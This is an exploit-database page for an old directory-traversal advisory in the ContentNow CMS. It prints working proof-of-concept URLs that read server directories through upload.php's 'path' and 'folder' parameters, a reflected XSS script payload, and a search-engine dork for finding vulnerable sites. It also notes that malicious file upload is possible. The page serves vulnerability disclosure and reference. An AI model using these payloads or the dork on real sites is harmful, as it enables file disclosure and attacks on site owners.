header-logo
Suggest Exploit
vendor:
ContentNow
by:
Timq
7,5
CVSS
HIGH
Directory Traversal
22
CWE
Product Name: ContentNow
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

ContentNow Directory Traversal(upload.php)

It appears that it is possible to view any files on a system via 'upload.php'. Proper filtering not in affectfor the 'path' and 'folder' variables. You can also upload malicious files to where you have access through 'upload.php'.

Mitigation:

Ensure proper filtering is in place for the 'path' and 'folder' variables.
Source

Exploit-DB raw data:

ContentNow Directory Traversal(upload.php)
------------------------------------------
-vulnerability By: Timq 
-http://securitydb.org
-Team Root-Shell
-Email:timq[at]hushmail.com
------------------------------------------
It appears that it is possible to view any files on a system via 'upload.php'.
Proper filtering not in affectfor the 'path' and 'folder' variables.  You can also upload
malicious files to where you have access through 'upload.php'.
------------------------------------------
~PoC
------------------------------------------
http://site.com/cn/upload.php?path=/
http://site.com/cn/upload.php?folder=/
XSS:
http://site.com/cn/upload.php?path="><script>alert("xss")</script>
D0rk:
intitle:intitle:ContentNow 
------------------------------------------
shouts:Warpboy,Zeusixsixsix,Stansar,Preddy,OG,PunkerX,Ethernet,str0ke,Gamma,Maggot
everyone else
------------------------------------------

# milw0rm.com [2006-11-14]